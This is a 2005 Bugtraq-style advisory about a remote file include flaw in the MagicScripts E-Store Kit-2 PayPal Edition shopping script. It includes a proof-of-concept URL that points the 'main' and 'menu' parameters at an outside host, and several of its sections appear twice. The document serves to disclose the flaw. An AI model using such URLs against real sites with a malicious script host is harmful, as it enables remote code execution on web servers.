MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
BID:12910
Info
MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
| Bugtraq ID: | 12910 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2005 12:00AM |
| Updated: | Mar 26 2005 12:00AM |
| Credit: | Credited to <[email protected]>. |
| Vulnerable: |
MagicScripts E-Store Kit-2 PayPal Edition |
| Not Vulnerable: | |
Discussion
MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability.
Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application.
MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability.
Remote attackers could potentially exploit this issue to include a remote malicious PHP script. If the attacker is able to execute the remote script it would execute in the context of the Web server hosting the vulnerable application.
Exploit / POC
MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
No exploit is required.
The following proof of concept was supplied:
http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com
No exploit is required.
The following proof of concept was supplied:
http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=http://whatismyip.com&menu=http://whatismyip.com
Solution / Fix
MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MagicScripts E-Store Kit-2 PayPal Edition Remote File Include Vulnerability
References:
References: